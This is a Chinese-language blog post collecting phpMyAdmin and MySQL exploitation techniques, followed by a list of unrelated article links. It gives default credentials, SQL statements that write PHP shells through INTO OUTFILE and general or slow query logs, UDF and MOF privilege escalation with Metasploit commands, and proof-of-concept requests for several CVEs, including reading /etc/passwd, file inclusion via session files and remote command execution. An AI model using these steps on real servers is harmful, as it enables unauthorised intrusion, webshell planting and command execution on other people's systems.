关于phpmyadmin的利用方式大佬们已经总结的很好了,这里只是造轮子(便于记录学习)

确认版本

渗透测试信息搜集永远是首位(也是最重要的一步).
 

默认目录/doc/html/index.html

phpmyadmin漏洞利用

大多数的漏洞利用方式都为登录后利用,需要进入后台才可以进行利用。常见密码为root:root root:(空格) mysql:mysql
 
常见的GetShell方式

  • 直接写Shell

    使用条件
     
    当前用户有写入权限

    知道web目录绝对路径

    web路径可写
     
    执行show variables like 'secure_file_priv';若是secure_file_priv一栏是空(如果是NULL的话就代表不允许导入导出)的那么就代表任意位置有写入webshell的权限,否者则为指定的路径(此项在mysql.ini中进行修改)。

     
    猜测web目录的绝对路径
     
    执行show variables like '%datadir%';根据数据库的默认存储位置来猜测web目录绝对路径。
     

     
    是phpstudy的话猜测web目录应该为c:\phpStudy\PHPTutorial\www\
     
    直接写shell
     
    执行select '<?php phpinfo();?>' into outfile 'c:\\phpStudy\\PHPTutorial\\www\\pppp.php';

  • 通过开启日志功能来进行GetShell

    使用条件

    必须为root用户

    • 开启日志记录

      set global general_log = "ON";

    • 指定日志文件

      set global general_log_file = "C:/phpStudy/PHPTutorial/WWW/.404.php";

    • 写入执行代码

      select "<?php phpinfo();?>";

  • 设置慢查询日志记录(如名就是一些操作慢的查询会被写入日志)

    • 查询慢查询日志的位置

      show variables like '%slow%';

    • 重新设置慢查询日志路径

      set GLOBAL slow_query_log_file='C:/phpStudy/PHPTutorial/WWW/pppp.php';

    • 开启慢查询日志

      set GLOBAL slow_query_log=on;

    • 执行慢查询写入日志

      select '<?php phpinfo();?>' from mysql.db where sleep(10);
       

      UDF提权(用户自定义函数)

  • 利用条件

    需要具备写权限+插件目录可写(或者可以更改指定的插件目录),具体情况要看目标mysql的版本。

    1. 在mysql>5.1时,dll或者so必须位于mysql安装目录下的lib\plugin下,当对此目录有写权限的时候可以利用.
       
      查询插件目录show variables like '%plugin%';

    2. 5.0<=mysql version<5.1时,需要导出至目标服务器的系统目录C:\\Windows\\System32.

    3. version < 5.0时,目录可以自定义.

    写入dll
     
    select 'xxx' into dumpfile 'c:\\\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin\\lib_mysqludf_sys.dll'
     
    创建函数
     
    create function sys_eval returns string soname "lib_mysqludf_sys.dll";
     
    执行命令
     
    select * from mysql.func where name = 'sys_eval';查看创建的函数
     
    select sys_eval('whoami');执行命令

    MOF提权

    通过mysql将文件写入一个MOF文件替换掉原有的MOF文件,然后系统每隔五秒就会执行一次上传的MOF。一般适用于Windows <= 2003,并且C:\Windows\System32\mof目录具有写权限(一般是没有权限写)。可以使用MSF直接利用:

se exploit/windows/mysql/mysql_mof
setrhost 192.168.1.5
setrport 3306
setpasswordroot
setusername root
exploit

phpmyadmin的一些其他漏洞

WooYun-2016-199433:任意文件读取漏洞(phpMyAdmin2.x)

POST /scripts/setup.php HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80 action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

CVE-2014-8959:本地文件包含(影响范围:phpMyAdmin 4.0.1--4.2.12,需要PHP version < 5.3.4 ,Poc如下:)

/gis_data_editor.php?token=2941949d3768c57b4342d94ace606e91&gis_data[gis_type]=/../../../../phpinfo.txt%00  # 注意改下token值

CVE-2016-5734:后台RCE(影响范围:PhpMyAdmin 4.0.x-4.6.2,需要PHP 4.3.0-5.4.6 versions,利用如下:)

cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system('ls -lua');"

CVE-2018-1261:后台文件包含(phpMyAdmin 4.8.0和4.8.1,经过验证可实现任意文件包含。利用如下:)

执行sql语句,将PHP代码写入Session文件中:select '<?php phpinfo();exit;?>';

包含session文件
 
http://10.1.1.10/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_*** # *** 为phpMyAdmin的COOKIE值

CVE-2018-19968:任意文件包含/RCE(phpMyAdmin 4.8.0~4.8.3)

  1. 创建数据库,并将PHP代码写入Session文件中

    CREATE DATABASE foo;
    CREATE TABLE foo.bar (baz VARCHAR(100) PRIMARY KEY );
    INSERT INTO foo.bar SELECT '<?php phpinfo(); ?>';
  2. 生成foo数据库的phpMyAdmin的配置表,访问

    http://10.1.1.10/chk_rel.php?fixall_pmadb=1&db=foo

  3. 篡改数据插入pma__column_info中:

    http://10.1.1.10/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[multi_edit][][]=baz&clause_is_unique=1

  4. 访问包含session文件地址

    http://10.1.1.10/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[multi_edit][][]=baz&clause_is_unique=1

后记

前面关于phpmyadmin的渗透都是根据大佬的博客来总结出来的,后面的话就来讲一下不同版本mysql的一些特性吧.

  1. 在mysql5.0之后才引入的information_schema系统数据库,也就是说在mysql5.0以后才可以使用盲注、联和查询。
  2. 在mysql5.6以上的版本中,系统Mysql库中存在两张与innodb相关的表 innodb_table_stats 和 innodb_index_stats

如图可以查询到数据库.
 

记得还有mysql多少版本才可以使用联和查询来着(忘了23333).

参考博客

t3ngyu师傅

大部分的东西都是借鉴t3ngyu师傅的

phpmyadmin利用的多种方式的更多相关文章

  1. idea打包jar的多种方式

    这里总结出用IDEA打包jar包的多种方式,以后的项目打包Jar包可以参考如下形式: 用IDEA自带的打包形式 用Maven插件maven-shade-plugin打包 用Maven插件maven-a ...

  2. JavaScript中判断为整数的多种方式

    之前记录过JavaScript中判断为数字类型的多种方式,这篇看看如何判断为整数类型(Integer). JavaScript中不区分整数和浮点数,所有数字内部都采用64位浮点格式表示,和Java的d ...

  3. intelliJ 打包jar的多种方式

    这里总结出用IntelliJ IDEA打包jar包的多种方式,以后的项目打包Jar包可以参考如下形式: 用IDEA自带的打包形式 用Maven插件maven-shade-plugin打包 用Maven ...

  4. idea打包jar的多种方式,用IDEA自带的打包形式,用IDEA自带的打包形式 用Maven插件maven-shade-plugin打包,用Maven插件maven-assembly-plugin打包

    这里总结出用IDEA打包jar包的多种方式,以后的项目打包Jar包可以参考如下形式: 用IDEA自带的打包形式 用Maven插件maven-shade-plugin打包 用Maven插件maven-a ...

  5. 特性attribute,声明和使用attribute,应用attribute,AOP面向切面,多种方式实现AOP

    1 特性attribute,和注释有什么区别2 声明和使用attribute3 应用attribute4 AOP面向切面5 多种方式实现AOP ---------------------------- ...

  6. Intellij IDEA 打包jar的多种方式

    IDEA打包jar包的多种方式 用IDEA自带的打包形式 用Maven插件maven-shade-plugin打包 用Maven插件maven-assembly-plugin打包 1.view-> ...

  7. 云小课 | 搬迁本地数据至OBS,多种方式任你选

    摘要:搬迁本地数据至OBS,包括OBS工具方式.CDM方式.DES磁盘方式.DES Teleport方式和云专线方式,每种方式特点不同,本节课我们就一起看看有什么区别. 已有的业务数据可能保存在本地的 ...

  8. Java中测试异常的多种方式

    使用JUnit来测试Java代码中的异常有很多种方式,你知道几种? 给定这样一个class. Person.java 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ...

  9. Spring学习总结(一)——Spring实现IoC的多种方式

    控制反转IoC(Inversion of Control),是一种设计思想,DI(依赖注入)是实现IoC的一种方法,也有人认为DI只是IoC的另一种说法.没有IoC的程序中我们使用面向对象编程对象的创 ...

随机推荐

  1. kubernetes批量删除pod

    监控页面出现看到有运行失败的pod 1) 查看有哪些不运行的podcustom-metrics-apiserver日志占满空间被驱逐 [root@hadoop03 ~]# kubectl get po ...

  2. (转)使用openGL显示图像(一)建立OpenGL ES的环境

    编写:jdneo - 原文:http://developer.android.com/training/graphics/opengl/environment.html 要在应用中使用OpenGL E ...

  3. ()C#打印机

    System.Drawing.Printing下得用来完成打印功能 1.打印设置 2.页面设置 3.打印预览 4.打印

  4. JdbcTemplate 的oracle分页

    @Autowired private JdbcTemplate jd; int ps1=Integer.valueOf(pageSize); int cp1=Integer.valueOf(currP ...

  5. Java学习之接口

    接口作用:为类提供额外功能(方法) 一.接口定义 interface IDemo { ;//可以简写:int NUM=4; public abstract void show();//可以简写:voi ...

  6. Kattis - barcode

    Kattis - barcode 题目原文: To prepare for ACM-ICPC 2017 in Saigon, the host univeristy – Ho Chi Minh cit ...

  7. 力扣算法——138CopyListWithRandomPointer【M】

    A linked list is given such that each node contains an additional random pointer which could point t ...

  8. JeeSite使用(一)大步跑起来

    背景:近期准备换个工作,想对之前自己写的代码进行重构,选择了JeeSite 需求:跑起来才是硬道理 方法:1.官方文档有坑,别信他    2.官方文档有坑,别信他     3.官方文档有坑,别信他 一 ...

  9. CF1228F

    写了一个特别麻烦的做法 首先一共有三种情况:1.删掉一个叶子,2.删掉根的一个儿子,3.其他的节点 第一种情况会有两个度数为2的节点,第二种情况没有度数为2的节点,第三种情况会有一个度数为4的节点 然 ...

  10. >>> print "hello" SyntaxError: Missing parentheses in call to 'print'

    错误原因说你的函数print缺省圆括号,可以知道你用的python是3.x版本3.x版本的python,print中的参数要用圆括号括起来,改成:print("hello")